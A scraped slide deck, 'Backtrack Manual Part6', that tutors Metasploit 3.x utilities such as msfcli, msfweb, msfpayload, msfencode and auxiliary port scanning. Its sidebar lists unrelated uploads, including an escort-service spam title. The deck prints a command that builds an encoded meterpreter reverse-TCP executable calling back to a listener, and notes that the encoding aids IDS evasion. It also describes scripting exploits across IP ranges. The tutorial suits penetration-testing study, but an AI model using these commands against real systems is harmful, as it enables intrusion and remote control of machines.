ICT Role in 21st Century Education & its Challenges.pptxICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxAreebaZafar22
 
Accessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impactAccessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impactdawncurless
 
Application orientated numerical on hev.ppt
Application orientated numerical on hev.pptApplication orientated numerical on hev.ppt
Application orientated numerical on hev.pptRamjanShidvankar
 
Gardella_Mateo_IntellectualProperty.pdf.
Gardella_Mateo_IntellectualProperty.pdf.Gardella_Mateo_IntellectualProperty.pdf.
Gardella_Mateo_IntellectualProperty.pdf.MateoGardella
 
This PowerPoint helps students to consider the concept of infinity.
This PowerPoint helps students to consider the concept of infinity.This PowerPoint helps students to consider the concept of infinity.
This PowerPoint helps students to consider the concept of infinity.christianmathematics
 
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...christianmathematics
 
Unit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptxUnit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptxVishalSingh1417
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxheathfieldcps1
 
Unit-IV; Professional Sales Representative (PSR).pptx
Unit-IV; Professional Sales Representative (PSR).pptxUnit-IV; Professional Sales Representative (PSR).pptx
Unit-IV; Professional Sales Representative (PSR).pptxVishalSingh1417
 
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxSOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxiammrhaywood
 

Kürzlich hochgeladen (20)

1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf
 
Z Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphZ Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot Graph
 
Introduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsIntroduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The Basics
 
Grant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy ConsultingGrant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy Consulting
 
Advance Mobile Application Development class 07
Advance Mobile Application Development class 07Advance Mobile Application Development class 07
Advance Mobile Application Development class 07
 
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in DelhiRussian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
 
Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global Impact
 
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
 
Unit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxUnit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptx
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdf
 
ICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptx
 
Accessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impactAccessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impact
 
Application orientated numerical on hev.ppt
Application orientated numerical on hev.pptApplication orientated numerical on hev.ppt
Application orientated numerical on hev.ppt
 
Gardella_Mateo_IntellectualProperty.pdf.
Gardella_Mateo_IntellectualProperty.pdf.Gardella_Mateo_IntellectualProperty.pdf.
Gardella_Mateo_IntellectualProperty.pdf.
 
This PowerPoint helps students to consider the concept of infinity.
This PowerPoint helps students to consider the concept of infinity.This PowerPoint helps students to consider the concept of infinity.
This PowerPoint helps students to consider the concept of infinity.
 
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
 
Unit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptxUnit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptx
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptx
 
Unit-IV; Professional Sales Representative (PSR).pptx
Unit-IV; Professional Sales Representative (PSR).pptxUnit-IV; Professional Sales Representative (PSR).pptx
Unit-IV; Professional Sales Representative (PSR).pptx
 
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxSOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
 

Backtrack Manual Part6

  • 1.
  • 2. A single user exploiting multiple targets during one session, either in interactive or in batch mode.
  • 3. Opening multiple payload sessions at once
  • 4. Suspending and restoring payload sessions.
  • 5. Sharing payload sessions with other users.
  • 6. A group of penetration testers collaborating on testing the same network or different networks.
  • 7. A penetration tester remotely logging in to the pre-configured Metasploit system, and launching exploits from there.The channels available with Metasploit v3.x are listed below:<br />The Directory Structure of the Framework<br />Updating Metasploit<br />The Framework can be updated using a standard Subversion client. The old msfupdate tool is no longer supported. Windows users can click on the Online Update link within the Metasploit 3 program folder on the Start Menu. To obtain the latest updates on a Unix-like platform, change into the Framework installation directory and execute svn update. If you are accessing the internet through a HTTP proxy server, please see the Subversion FAQ on proxy access:<br />http://subversion.tigris.org/faq.html#proxy<br />One of the primary values of Metasploit is that it is constantly being updated to provide exploits for the newest and most interesting vulnerabilities. As time goes on and patches are applied, a given exploit becomes less and less likely to work, so using the latest exploits is usually a very good idea. By routinely updating Metasploit (e.g before every use), you give yourself the best<br />chance of exploiting your targets successfully. Older versions of Metasploit used a custom utility called msfupdate to grab the latest code, but as of Metasploit 3.0, msfupdate has been replaced by Subversion (http://subversion.tigris.org). Once you’ve downloaded Metasploit, you now keep it up to date simply by using your Subversion client of choice to “update” the Metasploit directory. For example, I update my Metasploit using the Unix command-line Subversion client called svn, which looks something like this:<br />svn update<br />At revision 4532.<br />This isn’t a particularly exciting example because my Metasploit was already up to date, but then again, that’s a good thing. If your Metasploit was in need of updating, you would see a list of file modifications and deletions more like this:<br />svn update<br />UU modules/nops/ppc/simple.rb<br />UU modules/nops/x86/opty2.rb<br />UU modules/nops/x86/single_byte.rb<br />UU modules/nops/nop_test.rb.ut.rb<br />A modules/nops/php<br />A modules/nops/php/generic.rb<br />UU modules/nops/sparc/random.rb<br />…………<br />………..<br />Updated to version 4532<br />Msfopcode<br />The Metasploit project team has done a marvelous job in creating an opcode database that now consists of over 14 million opcodes. Earlier, this database was accessible only over the Web on the Metasploit Web site.With version 3.0 of the framework, this data can now be accessed via the msfopcode interface, which connects back to the Metasploit Web server to retrieve the actual information. The options available with msfopcode are available when executing this utility with the –h switch. This interface is merely a front end to the ex::Exploitation::OpcodeDb::Client class interface that interfaces with a HTTP-based XML protocol running on the Metasploit.com Web server.<br />./msfopcode<br />Usage: msfopcode command<br />SUPPORTED COMMANDS<br />stats Display database statistics<br />locales Display supported locales<br />metatypes Display Supported opcode meta types (Ex: imp reg)<br />groups Display supported opcode groups (Ex:esp=>eip)<br />types Display supported opcode type (Ex: imp esp)<br />platforms Display supported platforms<br />modules Display information about specific modules<br />search Search for opcode given a set of criteria<br />The purpose of the stats command is to show the current database statistics, such as the number of opcodes and modules currently indexed by the database and the last time the database was updated. The output to this command looks something like this:<br />./msfopcode stats<br />Last Updated : Sat Sep 03 01:32:00 CDT 2005<br />Number of Opcodes : 12177419<br />Number of Opcode Types : 320<br />Number of Platforms : 14<br />Number of Architectures : 1<br />Number of Modules : 17683<br />Number of Module Segments: 71457<br />Number of Module Imports : 2065492<br />Number of Module Exports : 927637<br />Msfrpc/ Msfrpcd<br />The msfrpcd daemon uses the xmlrpc plugin to provide a remote interface to the Metasploit Framework. By default, This service listens on port 55553, uses SSL, and is password protected. The msfrpcd daemon uses the xmlrpc plugin to provide a remote interface to the Metasploit Framework. By default, This service listens on port 55553, uses SSL, and is password protected.The RPC interface allows access to a minimal set of framework APIs, covering the core framework, the module set, the job list, and the session table. These APIs can be used to enumerate modules, execute them, and interact with the resulting sessions and jobs.<br />[ USAGE ]<br />To activate the RPC interface, launch msfrpcd, or load msfconsole and load the xmlrpc plugin.<br />./msfrpcd -P s3cr3tp4ss<br />- or -<br />msf> load xmlrpc Pass=password<br />Once the interface is started, any compatible RPC interface be used to interact with the service. The 'msfrpc' client provides a Ruby shell that can be used to talk to the service.<br />./msfrpc -h server_name -P s3cr3tp4ss<br />[*] The 'rpc' object holds the RPC client interface<br />>> rpc.call(quot; core.versionquot; )<br />=> {quot; versionquot; =>quot; 3.3-devquot; }<br />Msfd<br />The msfd utility opens a network interface to the msfconsole. It can be executed by specifying the IP address and the port on which it should listen for incoming connections.This allows a single user or multiple users to connect from a remote system to the framework. For instance, the following command will execute the msfd utility as a daemon listening on IP address 192.168.137.128 and port 55554:<br />msfd -a 192.168.137.128 –d –p 55554<br />Msfelfscan/ Msfpescan/ Msfmachscan<br />Msfelfscan, used to locate interesting addresses within executable and linkable format (ELF) programs, which may prove useful in developing exploits. Msfpescan does the same thing for Windows binaries.<br />Auxiliary Modules<br />Auxiliary modules are essentially used to cover the first stage of a penetration test—fingerprinting and vulnerability scanning. The Auxiliary module system includes the Scanner mixin, which makes it possible to write scanning modules that will target one host or a range of user specified hosts. Auxiliary modules can also import any Exploit module mixin, and leverage the protocol-specific application program interfaces (APIs) for Distributed Computing Environment Remote Procedure Call [DCERPC], HTTP, Server Message Block (SMB) and Sun Remote Procedure Call (RPC) protocols. Any exploitation code that does not use a payload would be part of the auxiliary module system.This currently includes dos/windows/smb/ms06_035_mailslot (exploits the MS06-035 kernel pool memory corruption bug in SRV.SYS) and dos/windows/smb/rras_vls_null_deref (triggers a NULL dereference in svchost.exe on all current versions of Windows that run the Routing and Remote Access Service [RRAS]).<br />List all auxiliary modules<br />Metasploit 3.0 supports the auxiliary modules which can be used to perform arbitrary, one-o_ actions such as port scanning, denial of service, and even fuzzing.<br />Now use the appropriate auxiliary module as per your requirement:<br />msf > use scanner/portscan/tcp<br />msf > show options<br />msf > set rhosts 192.168.1.100 or 192.168.1.1/24<br />msf > set ports 1-1024<br />msf > run<br />TCP portscan Result<br />Msfgui<br />The msfgui interface was introduced in version 3.1 and provides the functionality of msfconsole in addition to many new features. To access a msfconsole shell, select the Console option from the Window menu. To search for a module within the module tree, enter a string or regular expression into the search box and click the button labeled Find. All matching modules will appear the tree below. To execute a module, double-click its name in the tree, or right-click its name and select the Execute option. To view the source code of any module, right-click its name and select the View Code option.<br />This new GUI is multi-platform and it is based on Java, the Netbeans project for it can be found in the external/source/gui/msfguijava/ directory for those who want to contribute and have Ninja Skills with Java and user interface. The GUI can be ran by invoking the msfgui script at the base of the Metasploit directory<br />./msfgui<br />The Metasploit Graphical User Interface<br />Msfcli<br />The msfcli interface allows for exploits to be executed from the UNIX or Windows command line without the need to first launch the msfconsole interface. This is best suited for quickly launching an exploit by directly specifying the required parameters as command-line arguments. It is also particularly useful when a large number of systems need to be tested for the same vulnerability. A simple shell script can be written, which cycles through a range of IP addresses and uses msfcli to run exploits against each of the targeted systems. Using the –h switch gives us the options available with this interface A straightforward example that demonstrates the easiest way to run an exploit using the msfcli interface would be:<br />1. Display information about a selected exploit ./msfcli <exploit_name> S<br />2. Show available payloads ./msfcli <exploit_name> P<br />3. Choose the payload with this exploit, and display the options that need to be set<br />./msfcli <exploit_name> PAYLOAD=<payload_name> O<br />4. List available targets ./msfcli <exploit_name> PAYLOAD=<payload_name> T<br />5. Set the required options in option=value form and execute with the E mode<br />Exploiting Windows Box with Msfcli<br />Msfweb<br />The msfweb interface is based on Ruby on Rails. To access this interface, execute msfweb to start up the server. The msfweb interface uses the WEBrick web server to handle requests. By default, msfweb will listen on the loopback address (127.0.0.1) on port 55555. A log message should be displayed indicating that the service has started. To access the interface, open your browser to the appropriate URL (http://127.0.0.1:55555/ by default).<br />The main msfweb interface consists of a toolbar containing various icons and a background with the metasploit logo. If you want access to a console, click the Console link. This console interface is nearly identical to the standard msfconsole interface. The Exploits, Auxiliary, and Payloads links will walk you through the process of selecting a module, con_guring it, and running it. Once an exploit is run and a session is created, you can access these sessions from the Sessions link. These icons will open up a sub-window within the page. These windows can be moved, minimized, maximized, and closed.<br />The msfweb interface is the only GUI currently available to the MSF. It offers no security whatsoever, but is currently the recommended way to use the framework on Windows. This interface can be launched with a number of options, which are available with the –h switch, as shown in the following example:<br />./msfweb –h<br />Usage: msfweb <options><br />OPTIONS:<br />-a <opt> Bind to this IP address instead of loopback<br />-d Daemonize the web server<br />-h Help banner<br />-p <opt> Bind to this port instead of 55555<br />-v <opt> A number between 0 and 3 that controls log verbosity<br />For instance, the following command would launch the Web interface on IP address<br />192.168.1.10 on the default port 55555 and send it into daemon mode. We can connect to it through any supported browser (Mozilla Firefox, Microsoft Internet Explorer, or Safari).<br />./msfweb -a 192.168.1.10 –d<br />Now on any browser type url<br />http://192.168.1.10:5555<br />Msfencode<br />The msfencode utility provides direct access to the payload encoders provided with the framework. These can be listed out using the –l option. Other options that can be used are available using the –h switch.<br />A simple usage for this would be to use the msfpayload utility to generate the payload in raw format, and either pipe the output directly to msfencode or to read it from a file. Encoding ensures that bad characters do not occur in the payload, which also ends up improving the IDS evasion probability. Let’s say we want to encode the payload, but limit ourselves to an alpha-numeric output. We would also like to avoid the NULL (0x00) byte from occurring in the output. This can be done with the msfencode command As can be seen, the size of the output has increased due to the encoding—it was 116 bytes after running the msfpayload command where we redirected the output in raw format to the file in_exec_raw. But when this file is given as input to the encoder, it is now 296 bytes.<br />./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444<br />R | ./msfencode -c 5 -t exe > /tmp/meterpreter_reverse_tcp.exe<br />Generating encoded executable meterpreter reverse Payload<br />Msfpayload<br />The msfpayload utility enables the user to modify existing payloads depending on supplied parameters on the command line, and obtain the output in C, Perl, Ruby or Raw.The following example illustrates the use of msfpayload. The msfpayload –h command lists out the options that can be used along with all the available payloads. We now need to select a payload. The S option shows us information about a specific Payload.<br />After selecting a particular payload to play around with, we can then have msfpayload modify values within the payload, and produce an output with the C option for including the payload as part of a C program, or with the P option for using it in Perl scripts. It could also be output with the Raw format, which allows it to be piped to another program, such as msfencode, or could be redirected to a file. As can be seen from the output shown above, we need to set the CMD parameter in order for a payload to be created, which would execute that particular command upon successful exploitation.We will set it to a very straightforward dir command, and obtain the output for including it in a Ruby script, as shown below:<br />./msfpayload windows/exec CMD=calc.exe P<br />Msfconsole<br />The msfconsole is the traditional and primary means of using the MSF. After installation, the console can be simply launched by typing the command ./msfconsole (for UNIX) and msfconsole (for Windows) from within the path where it has been installed.The prompt that appears as shown in Figure 1.5, displays the graphical Metasploit logo, the version of the framework, the number of exploits, payloads, encoders, NOPs and auxiliary modules available. Immediately after launching the exploit, the intuitive command to type is help and the output from this is shown below.<br />Launching the MSF console<br />Output of the help or ? Command<br />